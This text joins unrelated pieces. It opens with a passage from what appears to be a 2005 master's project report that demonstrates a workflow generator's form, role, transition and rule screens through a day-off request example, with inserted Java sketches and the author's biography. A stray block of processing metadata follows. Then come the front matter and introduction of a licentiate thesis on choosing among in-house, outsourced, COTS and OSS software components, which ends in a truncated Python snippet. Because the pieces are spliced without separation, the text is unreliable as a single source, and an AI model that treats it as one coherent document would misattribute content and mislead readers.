The Form tab is shown in Figure B15. The Workflow Engineer enters a form label and an optional description before adding the form. The mode defaults to design mode so full editing capabilities are available to her.
The Pages tab is shown in Figure B16. The Workflow Engineer must select the form she would like to modify from the list of available forms. The form we are building will contain a single page, so we will add a page called "pageone." We enter "pageone" as the label and select the add button. We do not need to worry about the order since there is only one page.
Figure B16: The Design Form - Pages Tab
The Sections tab is shown in Figure B17. The form we are building will contain two sections, so we will add two sections, one called “Employee Information” and the other called “Manager Information.” We enter the label for the section and select the add button. We repeat this for each section. In this example, we would like the Manager section to appear after the Employee section. After adding the Manager section, we will change the order number to 2 and select the update button.
Figure B17: The Design Form - Sections Tab
The Controls tab is shown in Figure B18. The form we are building will contain three controls for the Employee section and a single control for the Manager section. For the Employee section we will add one dropdown control and two date controls. For the Manager section, we will add one text area control.
First, we select a control type. We will select DROPDOWN from the list of choices. Notice that the Select List option becomes available. Because this is a Dropdown control, we must select the list we want to associate with this control. We will choose the Day Off Request Types list we created earlier. Next, we enter a label for our control as well as an optional tool tip. Once we confirm the appropriate section is selected, we add the control. We repeat this process for the remaining controls we want to appear on the form.

The results of selecting the View Form tab can be seen in Figure B19. The form we are building can be viewed at any time during the build process. Our form is almost complete. The controls appear in the correct order. However, the comment area looks too narrow. We can go back to the control tab, select the Reason For Denial control, and update the size of the control. The new results are shown in Figure B20.
Workflow Management
In order to demonstrate the workflow management tools, we will build a simple workflow for requesting a day off. This workflow will contain four states. The initial state will be displayed as "Pending Employee Request," followed by "Pending Manager Review"; the remaining two states depend on the Manager's decision. If the Manager approves the request, the instance will enter the Closed state. If the Manager denies the request, the instance will enter the "Request Denied" state for the employee to review.
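The engine's internals are not shown in the report; as a sketch under that caveat, the four states and three legal transitions described above could be captured as a simple transition table. State and class names here are illustrative:

```java
import java.util.List;
import java.util.Map;

// Hypothetical sketch of the RequestADayOff workflow: four states,
// where "Pending Manager Review" has two outgoing transitions that
// the Manager chooses between at run time.
enum State { PENDING_EMPLOYEE_REQUEST, PENDING_MANAGER_REVIEW, REQUEST_DENIED, CLOSED }

public class DayOffWorkflowSketch {
    // Map each state to the states it may legally transition to.
    static final Map<State, List<State>> TRANSITIONS = Map.of(
            State.PENDING_EMPLOYEE_REQUEST, List.of(State.PENDING_MANAGER_REVIEW),
            State.PENDING_MANAGER_REVIEW, List.of(State.CLOSED, State.REQUEST_DENIED),
            State.REQUEST_DENIED, List.of(State.CLOSED),
            State.CLOSED, List.of());

    static boolean canTransition(State from, State to) {
        return TRANSITIONS.get(from).contains(to);
    }

    public static void main(String[] args) {
        System.out.println(canTransition(State.PENDING_MANAGER_REVIEW, State.CLOSED)); // prints true
        System.out.println(canTransition(State.CLOSED, State.PENDING_MANAGER_REVIEW)); // prints false
    }
}
```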
The Workflow Management menu gives the Workflow Engineer three options: Design Workflow, Modify Published Workflow, and Manage Roles.
Manage Roles
The Role tab is shown in Figure B21. Workflow Engineers can create custom roles to contain the appropriate members of the organization. For this example, we need to create two roles: Employee and Manager. To create a role, enter the role name and an optional description, then select the add button.
Figure B21: The Manage Roles - Role Tab
The Account Members tab is shown in Figure B22. Within this tab, we will add Stacy Hutchings as the only member of the Manager role. We must have the Manager role selected before we begin. Since the current role member list is empty, we must select Stacy Hutchings from the list of members, then select the add button. We will repeat this process for the Employee role. However, we will add the All User group to this role as shown in Figure B23.
Figure B22: The Manage Roles - Account Members Tab
Figure B23: The Manage Roles - Group Members Tab
Design Workflow
The Workflow tab is shown in Figure B24. The Workflow Engineer enters a workflow label and an optional description before adding the workflow. The mode defaults to design mode so full editing capabilities are available to her.
Figure B24: The Design Workflow - Workflow Tab
The States tab is shown in Figure B25. The Workflow Engineer must select the workflow she would like to modify from the list of available workflows. The workflow we are building will contain four states. Since one of them will be transitioning to the Close state, which is already provided by the system, we only need to create three states.
The first state we enter will be our initial state, although the order in which we enter them does not matter. For this entry, we must change the initial state indicator to YES; for the remaining states we will leave it as NO. We will assign the Employee role as the participant of this state. We will also give the participant permission to cancel this instance. However, we do not want them to be able to close the request or reassign it to another Employee.
Figure B26 and Figure B27 show the remaining states and their settings. The participant at the Request Denied state will be given permission to close the instance.
Figure B26: States Tab: Pending Manager Review
Figure B27: States Tab: Request Denied
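A state definition, as configured in the tabs above, pairs a participant role with per-state permission flags (cancel, close, reassign). The following sketch is purely illustrative: the record and field names are hypothetical, and the cancel flag shown for Request Denied is an assumption, since only its close permission is stated in the text:

```java
// Hypothetical sketch of a state definition as configured in the
// States tab: each state names its participant role, whether it is
// the initial state, and what the participant may do there.
public class StateDefSketch {
    record StateDef(String label, String participantRole, boolean initial,
                    boolean mayCancel, boolean mayClose, boolean mayReassign) {}

    public static void main(String[] args) {
        // Pending Employee Request: may cancel, but not close or reassign.
        StateDef pendingRequest = new StateDef("Pending Employee Request",
                "Employee", true, true, false, false);
        // Request Denied: participant is given permission to close.
        // (The cancel value here is an assumption for illustration.)
        StateDef requestDenied = new StateDef("Request Denied",
                "Employee", false, true, true, false);

        System.out.println(pendingRequest.mayClose()); // prints false
        System.out.println(requestDenied.mayClose());  // prints true
    }
}
```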
The Transitions tab is shown in Figure B28. The workflow we are building will contain three possible transitions: transition one, from Pending Employee Request to Pending Manager Review; transition two, from Pending Manager Review to Close; and transition three, from Pending Manager Review to Request Denied.
For transition one, we select the "from state," the "to state," give the transition a name, then select an assignment strategy. Since the manager role contains only one member, we use the Push-Auto Look Up strategy to let the system automatically assign the instance for us.
Figure B28: Transitions Tab: Transition One
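The Push - Auto Look Up strategy works because the role lookup is unambiguous: with exactly one role member, no human decision is needed. A minimal sketch of that decision, with hypothetical names (the system's actual assignment API is not shown in the report):

```java
import java.util.List;
import java.util.Optional;

// Hypothetical sketch of the Push - Auto Look Up assignment strategy:
// when the target role resolves to exactly one member, the system
// assigns the task automatically; otherwise the sender must pick a
// participant manually (Push - Manual).
public class AutoLookupSketch {
    static Optional<String> autoAssign(List<String> roleMembers) {
        return roleMembers.size() == 1
                ? Optional.of(roleMembers.get(0)) // unambiguous: assign it
                : Optional.empty();               // fall back to manual selection
    }

    public static void main(String[] args) {
        System.out.println(autoAssign(List.of("Stacy Hutchings"))); // prints Optional[Stacy Hutchings]
        System.out.println(autoAssign(List.of("Jimi Hutchings", "Caitlyn Hutchings")).isEmpty()); // prints true
    }
}
```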
Figure B29 shows the selections made for transition two. The assignment strategy does not matter when transitioning to the Close state. For the transition strategy, we will use Deferred Choice to present the transition decision to the Manager. We change the Deferred Choice indicator to YES, customize our label, and add an optional description before selecting the add button.
Figure B29: Transitions Tab: Transition Two
Figure B30 shows the selections made for transition three. The assignment strategy will be Push - Manual, since there are multiple users in the Employee role. For the transition strategy, we will again use Deferred Choice to present the transition decision to the Manager.
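With Deferred Choice, the engine does not pick the outgoing transition itself; it presents the labelled options to the participant and follows whichever one is selected. A sketch of that lookup, using the labels configured in this example (class and method names are hypothetical):

```java
import java.util.Map;

// Hypothetical sketch of the Deferred Choice transition strategy:
// the choice between outgoing transitions is deferred to the
// participant, who picks one of the configured labels at run time.
public class DeferredChoiceSketch {
    // Transition label -> destination state, as offered to the Manager.
    static final Map<String, String> MANAGER_CHOICES = Map.of(
            "Approve Request", "Close",
            "Deny Request", "Request Denied");

    static String choose(String label) {
        String dest = MANAGER_CHOICES.get(label);
        if (dest == null) throw new IllegalArgumentException("Unknown choice: " + label);
        return dest;
    }

    public static void main(String[] args) {
        System.out.println(choose("Approve Request")); // prints Close
        System.out.println(choose("Deny Request"));    // prints Request Denied
    }
}
```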
The From Strategies tab and the To Strategies tab provide a summary of the current transitions from two different perspectives. Figure B31 shows all transitions originating from a given state within the current workflow. Figure B32 shows all transitions converging on a given state within the current workflow.
Figure B31: The Design Workflow – From Strategies Tab
Figure B32: The Design Workflow – To Strategies Tab
Before we can define the process definition, both the workflow and the form must be placed in test mode as shown in Figure B33 and B34.
Figure B33: The Design Form - Form Tab
Figure B34: The Design Workflow - Workflow Tab
Definition Management
In order to demonstrate the definition management tools, we will add several form rules. We will also customize which fields should appear in the pending task queue within the task management component.
The Definition Management menu gives the Workflow Engineer two options: Design Definition and Modify Published Definition.
The Definition tab is shown in Figure B35. The Workflow Engineer enters a definition label and an optional description before adding the definition. In addition, she must select a form and a workflow. The mode defaults to design mode so full editing capabilities are available to her.

The Queue Fields tab is shown in Figure B36. The Workflow Engineer must select the definition she would like to modify from the list of available process definitions. Each dropdown list contains the form controls available for display in the task management component. We will select Request Type, Start Date, and End Date.
Figure B36: The Design Definition – Queue Fields Tab
The Rule tab gives the Workflow Engineer the ability to build transition as well as form rules. For this workflow, there are no required transition rules as shown in Figure B37. However, we would like to define several form rules. First, we would like to make the Request Type, Start Date, and End Date required for transition one. Second, we would like to add a rule to validate the Start Date is before the End Date. Third, we would like to make the Comments required for transition three.
Figure B37: The Design Definition - Rules Tab
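The three form rules above amount to required-field checks plus one cross-field date check, all evaluated before a transition is allowed. A sketch of that validation logic, with hypothetical names (the system's actual rule engine is not shown in the report):

```java
import java.time.LocalDate;
import java.util.ArrayList;
import java.util.List;

// Hypothetical sketch of the form rules for transition one: Request
// Type, Start Date, and End Date are required, and the Start Date
// must not fall after the End Date.
public class FormRulesSketch {
    static List<String> validateTransitionOne(String requestType,
                                              LocalDate start, LocalDate end) {
        List<String> errors = new ArrayList<>();
        if (requestType == null || requestType.isEmpty())
            errors.add("Request Type is required");
        if (start == null) errors.add("Start Date is required");
        if (end == null) errors.add("End Date is required");
        if (start != null && end != null && start.isAfter(end))
            errors.add("Start Date must be on or before End Date");
        return errors; // the transition is blocked until this list is empty
    }

    public static void main(String[] args) {
        System.out.println(validateTransitionOne(null,
                LocalDate.of(2005, 12, 8), LocalDate.of(2005, 12, 8)));
        // prints [Request Type is required]
    }
}
```

The required rule for transition three (Reason For Denial) would follow the same pattern against the Comments control.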
Figure B38 and Figure B39 show examples of the rule definitions for transition one. The type is Form Rule, the transition is transition one, the control to validate is indicated, and we are using the required validator.
Figure B38: Rules Tab: T1 - Request Type Required
Figure B39: Rules Tab: T1 - Start Date Required
Figure B40 shows the rule definitions for transition three. The type is Form Rule, the transition is transition three, the control to validate is indicated, and we are using the required validator. The View Rules tab, shown in Figure B41, provides a summary of all rules defined for the current process.
Figure B40: Rules Tab: T3 - Reason For Denial Required
Figure B41: The Design Definition - View Rules Tab
We have completed our process definition. We are ready to publish the definition. Publishing the definition automatically publishes the form as well as the workflow and makes the process definition available for system assignment. Figure B42 shows the process definition in published mode.
System Management
Now that we have a published process definition, we are ready to add the process to an existing system. Figure B43 shows the Manage Systems - System Processes tab. We will add the RequestADayOff process definition to the UNF System. Figure B44 shows the choices beneath the Select A System menu.
Figure B43: The Manage Systems - System Processes Tab
Figure B44: The Home Page - Select A System Menu
Task Management
To access the task management component, a user must select a system. Figure B45 shows the resulting workflow system when the user selects the UNF system.
Figure B45: The UNF System - Home Page
The Task Management component gives the Standard User three options: Select A Workflow, View a Workflow Queue, and Add A New Instance.
The user must select a workflow in order to access the other menu options. When the user chooses the RequestADayOff workflow, the system presents the current user with a list of pending tasks. In Figure B46, there are no pending tasks for Stacy Hutchings.
Figure B46: The UNF System - View Workflow Queue
The View Workflow Queue option automatically defaults to the pending tasks of the current user. The user has the ability to view All Open, Canceled, and Closed tasks, see Figure B47. Any additional workflow states that contain tasks will also appear in the list to choose from.
Figure B47: The UNF System – View Workflow Queue
When the user is ready to add a new workflow instance, she selects the Add New Instance option. The system presents the user with the Day Off Request Form shown in Figure B48. This is the custom form built by the Workflow Engineer for the RequestADayOff process.

Figure B48: The UNF System - Add New Instance
Request A Day Off Example in Action
To demonstrate the entire workflow process from within the Task Management component, Jimi Hutchings and Caitlyn Hutchings will play the part of the Employee. Stacy Hutchings will play the part of the Manager. Jimi and Caitlyn will each submit a request for time off. Stacy will approve the first request and deny the second request, to demonstrate the possible workflow transition paths.
To submit a request for time off, Jimi Hutchings selects the Add New Instance option. He is presented with the screen in Figure B48. He enters the type of request, the start date of his time off, and the end date of his time off. Once complete, he selects the add button. The request appears in his list of pending tasks, see Figure B49.
The queue displays the request ID, the date submitted, the name of the person who created the request, the version of the workflow definition, the three form fields selected by the workflow designer, the current status, and the person to whom the task is currently assigned.
Figure B49: The UNF System - J Hutchings’ Pending Queue
To view the task, Jimi selects the ID of the request. The system presents him with the view shown in Figure B50. Within the summary tab, the details of the form are displayed along with the option to update.

Within the Comments tab, the history of the instance is displayed. The system records all transition and assignment events. This screen also gives all users the ability to add comments. Figure B51 shows the Comments tab.
Figure B51: View Instance Details - Comments Tab
The Transition tab and the Reassign tab display transition and reassignment choices to the user respectively. Both options are determined by the workflow definition. Figure B52 and Figure B53 show each tab. Jimi has two transition options and zero reassignment options.
When Jimi is ready to send the request to his Manager, he will select the transition tab, select the transition option from the drop down list, then select the transition button. The request will be removed from Jimi’s list of pending tasks and appear as a pending task in his manager’s queue. Because the Auto-Look Up assignment strategy was selected for this transition, the system knows to automatically assign the task to Stacy Hutchings, who is listed as the only person for the Manager role. Figure B54 shows Stacy Hutchings’ pending queue after the request has been transitioned.
When Stacy views the request, she sees the details of the request. The Comments tab in Figure B55 shows the transition history. The Transition tab in Figure B56 presents her with a new list of transition decisions. The Manager has the option to Approve or Deny the request.


For this request, Stacy will select the Approve Request option, then select the transition button. The request transitions automatically to the Closed state. Figure B57 shows the tasks listed in the Closed queue. Figure B58 shows the Comments tab when viewing the details of the request.
Figure B57: View Workflow Queue - Closed
Figure B58: View Instance Details - Comments Tab
To demonstrate what happens in the event the request is denied, Caitlyn Hutchings will initiate a request for the same day off. She will select the Add New Instance option, enter the details for the request, and when she is satisfied with her request, she will transition it to her manager. Figure B59 shows the validation error that occurs when a transition rule fails. In this example, Caitlyn has forgotten to select the type of day off for her request. The request will not transition until all errors are corrected.
Figure B59: View Instance Details - Validation Error
Figure B60 shows the request has transitioned successfully to the Manager role. When Caitlyn views her request, which is no longer in her pending list of tasks, the system reminds her the request is in View Only Mode and removes the ability to update, transition, and reassign the request.
Figure B60: View Instance Details - View Only Mode
The new request appears in the Manager's list of pending tasks shown in Figure B61. For this example, the Manager is going to select the Deny Request option, then select the transition button without entering comments. Figure B62 shows the error message displayed.


After the Manager fills in the reason for denial, the system presents the Manager with a list of participants for assignment. The Manager would like to return the request to Caitlyn, so she selects her name from the list, then selects the assign button, see Figure B63.
Figure B63: Transition Tab: Select Participant
After the Manager denies the request, it returns to Caitlyn's pending task queue with a status of Request Denied, shown in Figure B64. Caitlyn has the ability to view the request and the reason for denial. Figure B65 shows the Transition tab with a single transition option of closing the instance.
Figure B64: Pending Tasks for Caitlyn Hutchings
Figure B65: View Instance Details - Transition Tab
Figure B66 shows both requests listed in the Closed task queue.
The purpose of the documentation was to demonstrate each of the components of the Workflow Generator and Tracking System and to provide a working example of how an end user would approach the task of creating and implementing a workflow.

<table>
<thead>
<tr>
<th>ID</th>
<th>Submit Date</th>
<th>Submit By</th>
<th>Version</th>
<th>Request Type</th>
<th>Start Date</th>
<th>Status</th>
<th>Assigned To</th>
</tr>
</thead>
<tbody>
<tr>
<td>15</td>
<td>12/04/2005 2:57 PM</td>
<td>Jimi Hutchings</td>
<td>1.0.0001</td>
<td>Personal Day</td>
<td>12/08/2005</td>
<td>Closed</td>
<td>Blaza Hutchings</td>
</tr>
<tr>
<td>17</td>
<td>12/04/2005 7:14 PM</td>
<td>Caitlyn Hutchings</td>
<td>1.0.0001</td>
<td>Personal Day</td>
<td>12/04/2005</td>
<td>Closed</td>
<td>Caitlyn Hutchings</td>
</tr>
</tbody>
</table>
Figure B66: The UNF System - View Workflow Queue Closed
Stacy Hutchings has a Bachelor of Arts degree from Flagler College in Secondary Mathematics Education, 1992, and expects to receive a Master of Science in Computer and Information Sciences from the University of North Florida, December 2005. Dr. Arturo Sánchez-Ruiz of the University of North Florida served as Stacy’s project director. Stacy is currently employed as a Senior Business Analyst at PHH Mortgage Company doing .NET web development and application support for the company’s internal departments. Stacy has been in her current position for only three months, but has been with the company for four years.
Stacy has on-going interests in both .NET and J2EE web development. Stacy’s academic work has included the use of Java, COBOL, and SQL. Married for the last 11 years, Stacy has two children, ages 8 and 9.
[32851, 34783, null], [34783, 38257, null], [38257, 41819, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2417, true], [2417, 5966, null], [5966, 9195, null], [9195, 11339, null], [11339, 14605, null], [14605, 16365, null], [16365, 19835, null], [19835, 23240, null], [23240, 26687, null], [26687, 27692, null], [27692, 31465, null], [31465, 32851, null], [32851, 34783, null], [34783, 38257, null], [38257, 41819, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 41819, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 41819, null]], "pdf_page_numbers": [[0, 2417, 1], [2417, 5966, 2], [5966, 9195, 3], [9195, 11339, 4], [11339, 14605, 5], [14605, 16365, 6], [16365, 19835, 7], [19835, 23240, 8], [23240, 26687, 9], [26687, 27692, 10], [27692, 31465, 11], [31465, 32851, 12], [32851, 34783, 13], [34783, 38257, 14], [38257, 41819, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 41819, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
8959fd2b9c4f9ada18fb747b17fd16bfee8e0121
|
TOWARDS DECISION-MAKING TO CHOOSE AMONG DIFFERENT COMPONENT ORIGINS
Deepika Badampudi
Blekinge Institute of Technology
Licentiate Dissertation Series No. 2016:01
Department of Software Engineering
Licentiate Dissertation in Software Engineering
Blekinge Institute of Technology, SWEDEN
ABSTRACT

Context: The amount of software in solutions provided in various domains is continuously growing. These solutions are a mix of hardware and software, often referred to as software-intensive systems. Companies seek to improve the software development process to avoid delays or cost overruns related to the software development.

Objective: The overall goal of this thesis is to improve the software development/building process to provide timely, high-quality and cost-efficient solutions. The objective is to select the origin of the components (in-house, outsource, components off-the-shelf (COTS) or open source software (OSS)) that facilitates the improvement. The system can be built of components from one origin or a combination of two or more (or even all) origins. Selecting a proper origin for a component is important to get the most out of a component and to optimize the development.
Method: To select among different component origins, it is necessary to investigate them. We conducted a case study to explore the existing challenges in software development. The next step was to identify factors that influence the choice among different component origins through a systematic literature review using a snowballing (SB) strategy and a database (DB) search. Furthermore, a Bayesian synthesis process is proposed to integrate the evidence from the literature into practice.
Results: The results of this thesis indicate that the context of software-intensive systems, such as domain regulations, hinders software development improvement. In addition to in-house development, alternative component origins (outsourcing, COTS, and OSS) are being used for software development. Several factors such as time, cost and license implications influence the selection of component origins. Solutions have been proposed to support the decision-making. However, these solutions consider only a subset of the factors identified in the literature.
Conclusions: Each component origin has some advantages and disadvantages. Depending on the scenario, one component origin is more suitable than the others. It is important to investigate the different scenarios and suitability of the component origins, which is recognized as future work of this thesis. In addition, the future work is aimed at providing models to support the decision-making process.
Keywords: Component-based software development, component origin, decision-making, snowballing, database search, Bayesian synthesis.
OVERVIEW OF PUBLICATIONS
Papers included in the thesis:
Contribution statement
Deepika Badampudi is the lead author of all the chapters. As the lead author she took the responsibility for designing, executing and reporting the studies. The contributions to the individual chapters are as follows:
**Chapter 2:** Deepika Badampudi designed the case study, participated in data collection by conducting the interviews, transcribed and analyzed all the interviews and reported the findings. The co-authors reviewed the case study design and commented on the final draft of the conference paper.
**Chapter 3:** Claes Wohlin contributed with the idea to conduct a systematic literature review. The review consists of two search strategies, Deepika Badampudi designed the review protocol and Claes Wohlin contributed to the design of the snowballing search strategy. Kai Petersen contributed in the database search strategy. Deepika Badampudi extracted the data from 18 (of 24) studies and wrote large parts of the final draft. Claes Wohlin and Kai Petersen reviewed and commented on the final draft of the journal paper.
**Chapter 4:** Claes Wohlin contributed with the idea to report experiences from conducting the snowballing search strategy. Deepika Badampudi contributed to the design of the study and reported the findings. Claes Wohlin and Kai Petersen commented and reviewed the final draft of the conference paper.
**Chapter 5:** Deepika Badampudi mainly contributed with the idea of the study. Claes Wohlin participated and contributed in all the brainstorming sessions. Deepika Badampudi reported the study and Claes Wohlin commented and reviewed the final draft of the conference paper.
Papers related but not included in the thesis:
ACKNOWLEDGEMENTS

Firstly, I would like to sincerely thank my advisor, Professor Claes Wohlin, for his continuous guidance, support, immense knowledge and motivation throughout this thesis. I am grateful for his timely feedback, constructive criticism and his willingness to listen to and consider my ideas.
I would also like to thank my co-advisor Professor Tony Gorschek for his inputs. The support and insightful comments from my co-authors Kai Petersen, Samuel A. Fricker and Ana M. Moreno are much appreciated. I thank my colleagues for providing a supportive work environment. Also, I thank Farnaz, Indira and Siva for the fun times and most importantly their friendship.
Words cannot express my true gratitude and love towards my husband, Gurudutt Velpula, who has been supporting and helping me to remain positive even through difficult times.
I thank my parents, Kishore and Indira for their love and care, my sister, Deepthi for being my best friend and my niece Kanisha for all the happy times.
CONTENTS
1 INTRODUCTION
  1 Overview
  2 Background
  3 Contribution and Research Gaps
    3.1 Chapter 2
    3.2 Chapter 3
    3.3 Chapter 4
    3.4 Chapter 5
    3.5 Research questions
  4 Research Methodology
    4.1 Case study (Chapter 2)
    4.2 Systematic literature review (Chapters 3 and 4)
  5 Overview of the Chapters
    5.1 Chapter 2: Perspectives on productivity and delays in large-scale agile projects
    5.2 Chapter 3: Software component decision-making: in-house, OSS, COTS or outsourcing - A systematic literature review
    5.3 Chapter 4: Experiences from using snowballing and database searches in systematic literature studies
    5.4 Chapter 5: Bayesian synthesis in software engineering: Method and illustration
  6 Conclusions and Future Work

2 PERSPECTIVES ON PRODUCTIVITY AND DELAYS IN LARGE-SCALE AGILE PROJECTS
  1 Introduction
  2 Related Work
  3 Research Methodology
  4 Results
    4.1 The development organization
    4.2 Challenges that affected productivity and delays
    4.3 Causes for the challenges
    4.4 Impact of challenges on productivity and delay of scrum teams
    4.5 Impact of challenges on productivity and delay of global project teams
  5 Discussion
  6 Conclusions

3 SOFTWARE COMPONENT DECISION-MAKING: IN-HOUSE, OSS, COTS OR OUTSOURCING - A SYSTEMATIC LITERATURE REVIEW
  1 Introduction
  2 Related Work
  3 Method
    3.1 Need for the review
    3.2 Study identification
    3.3 Data extraction and classification
    3.4 Quality assessment
    3.5 Analysis
    3.6 Validity threats
  4 Results
    4.1 Research types, methods and quality (RQ1)
    4.2 Influencing factors (RQ2)
    4.3 Solutions (RQ3)
  5 Discussion
    5.1 COTS over OSS
    5.2 OSS over COTS
    5.3 In-house over OSS and COTS
    5.4 COTS and OSS over In-house
    5.5 Research gaps
  6 Conclusion
  7 Acknowledgement

4 EXPERIENCES FROM USING SNOWBALLING AND DATABASE SEARCHES IN SYSTEMATIC LITERATURE STUDIES
  1 Introduction
  2 Related Work
  3 Research Method
    3.1 Details of snowballing
    3.2 Details of database search
    3.3 Research questions
  4 Results
    4.1 Evolution of the SB process (RQ1)
    4.2 Efficiency of SB (RQ2)
    4.3 Reliability of SB (RQ3)
  5 Discussion
  6 Conclusion

5 BAYESIAN SYNTHESIS IN SOFTWARE ENGINEERING: METHOD AND ILLUSTRATION
  1 Introduction
  2 Background and Related Work
    2.1 Overview of Bayesian synthesis
    2.2 Bayesian synthesis in health research
    2.3 Synthesis in software engineering
    2.4 Bayesian in software engineering
  3 Bayesian Synthesis - Method Description
    3.1 Step 1: The prior probability
    3.2 Step 2: The likelihood
    3.3 Step 3: The posterior probabilities - Refining prior probabilities
  4 Illustration 1
    4.1 Step 1: Prior probability
    4.2 Step 2: Likelihood
    4.3 Step 3: Posterior probability - Refining prior probability
  5 Illustration 2
  6 Discussion with Alternatives
  7 Conclusions

REFERENCES
LIST OF FIGURES

Figure 1 Overview of the thesis
Figure 2 Mapping of research questions and objectives
Figure 3 Thesis future work
Figure 4 Decision levels
Figure 5 Snowball search process
Figure 6 Database search process
Figure 7 Research types and studied combinations of component origins
Figure 8 Research methods and studied combinations of component origins
Figure 9 Positive and negative influences of project metrics factors
Figure 10 Positive and negative influences of external factors
Figure 11 Positive and negative influences of software development process factors
Figure 12 Trade-offs for COTS and OSS factors
Figure 13 Trade-offs for in-house, COTS and OSS factors
Figure 14 Evolution of identified papers
Figure 15 Citation matrix
Figure 16 Venn diagram for the overlapping papers
Figure 17 Options coverage
Figure 18 Dimension coverage
Figure 19 Three steps of Bayesian synthesis
Figure 20 Division of likelihood calculation
Figure 21 Four different approaches to refine prior probabilities
LIST OF TABLES
Table 1 Challenges that affected productivity and delays in the agile projects (italics: quotes)
Table 2 Conditions that gave rise to productivity and delay-affecting challenges (italics: quotes)
Table 3 Impact of challenges on scrum team (italics: quotes)
Table 4 Impact of challenges on global projects (italics: quotes)
Table 5 Secondary and primary studies related to the different decision levels
Table 6 Systematic reviews related to individual component origins
Table 7 Inclusion and exclusion decision rules
Table 8 Number of hits for database search
Table 9 Search type and number of relevant papers
Table 10 Data extraction form
Table 11 Rules defining the themes
Table 12 Total number of primary studies per comparison category
Table 13 Research types
Table 14 Research methods
Table 15 Domains of the primary studies
Table 16 Rigor and relevance scores of the empirical studies
Table 17 Primary studies discussing influencing factors for component origin (RQ2)
Table 18 High-level themes, themes and codes
Table 19 Project metrics factors
Table 20 External factors
Table 21 Software development process factors
Table 22 Primary studies proposing solutions for choosing a component origin (RQ3)
Table 23 Advantages of component origins
Table 24 Mapping of factors influencing the decision and factors considered in the solutions
Table 25 Nine search strings used by SB
Table 26 Inclusion and exclusion decision rules
Table 27 Search strings used by database search
Table 28 Compliance with the SB guidelines
Table 29 Efficiency of each iteration
Table 30 Revised efficiency of each iteration
Table 31 Comparison of backward snowballing (BSB) and forward snowballing (FSB)
Table 32 Efficiency comparison
Table 33 Conclusion analysis
Table 34 Prior probabilities - Practitioner's experience/opinion
Table 35 Data extraction from non-empirical and empirical research papers
Table 36 Context and quality of primary studies
Table 37 Likelihood based on empirical and non-empirical research papers
Table 38 Revised probabilities
Table 39 Refining probability by discussing internal and external conflicts
Table 40 Refining probability by discussing internal conflicts
Table 41 Refining probability by discussing external conflicts
Table 42 Refining probability by discussing conflicts only at the end
**ACRONYMS**
**CBSE** component-based software engineering
**COTS** components off-the-shelf
**OSS** open source software
**SB** snowballing
**FSB** forward snowballing
**BSB** backward snowballing
**DB** database
INTRODUCTION
1 OVERVIEW
The use of software is becoming more and more common in solutions provided in different domains, such as automotive, automation, health and telecommunication. Systems that consist of large amounts of software and provide value to their users are referred to as software-intensive systems. Companies are constantly seeking to improve the software development/building process to gain profit and competitive advantage. The improvements usually aim to provide timely, high-quality and cost-efficient solutions.
Component-based software engineering (CBSE) is known to increase productivity, save costs, and increase quality and reusability [105]. CBSE promotes development for reuse and building from existing software components [105]. Different alternatives to in-house development, such as outsourcing [59] and adopting COTS [11] and OSS [39] components, are gaining popularity. These different alternatives are referred to as component origins.
Like any other technology or process, no component origin is universally good or universally bad; some component origins are more appropriate than others based on the context of the projects and the organizations. Therefore, it is important to understand how the component origins are traded off, i.e. what criteria are used to select the component origins, in which context, using what process, techniques or tools. It is also important to understand the challenges of developing software-intensive systems. Knowing the limitations or shortcomings of in-house development for software-intensive systems will help the decision-makers to evaluate whether the existing challenges of in-house development can be mitigated by considering the alternative component origins.
The overall research goal is to provide a decision-support system for selecting component origins. Figure 1 depicts the focus of this
thesis to explore the challenges in in-house development and the trade-off between the different component origins.
We begin by exploring the in-house development environment through a case study [115]. Five software-intensive large-scale agile projects from different domains are investigated. The investigation allowed us to identify challenges that lead to productivity issues and delays in software-intensive systems (Chapter 2).
After understanding the limitations of in-house development, we investigate the alternatives to in-house development. The objective is to explore how the decision to choose the component origin is made. To understand the existing research on decision-making to choose the component origin, we conducted a systematic literature review (Chapter 3).
The main findings of the review are a list of criteria used to choose a component origin. The review also allowed us to investigate the existing solutions to address the decision-making process for component origin selection. The systematic literature review was conducted using a DB search and SB; we reported our experiences regarding the reliability and efficiency of the SB method in comparison to the DB search (Chapter 4).
Through the systematic literature review, we identified a number of important criteria that might influence the decision to choose a component origin. The next step is to integrate the data collected from the literature with the practitioners' opinions so that practitioners can use the information in their decisions. We wanted a systematic approach for this integration, which led us to design a synthesis approach that integrates the literature results and practitioners' opinions (Chapter 5).
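The synthesis approach (detailed in Chapter 5) follows three steps: a prior probability, a likelihood, and a posterior probability. As a minimal sketch of the underlying Bayesian update, the toy example below revises a practitioner's prior belief over component origins using evidence aggregated from the literature. All numbers and categories are invented purely for illustration, not taken from the thesis.

```python
# Minimal sketch of a Bayesian update: a practitioner's prior belief over
# component origins is revised with evidence from the literature.
# All probabilities here are invented for illustration.

origins = ["in-house", "outsource", "COTS", "OSS"]

# Step 1: prior probabilities elicited from a practitioner's experience.
prior = {"in-house": 0.40, "outsource": 0.10, "COTS": 0.20, "OSS": 0.30}

# Step 2: likelihood of the aggregated literature evidence given each origin,
# e.g. how strongly published studies favour each origin for this scenario.
likelihood = {"in-house": 0.20, "outsource": 0.10, "COTS": 0.30, "OSS": 0.40}

# Step 3: posterior = normalised (prior * likelihood), by Bayes' rule.
unnormalised = {o: prior[o] * likelihood[o] for o in origins}
total = sum(unnormalised.values())
posterior = {o: unnormalised[o] / total for o in origins}

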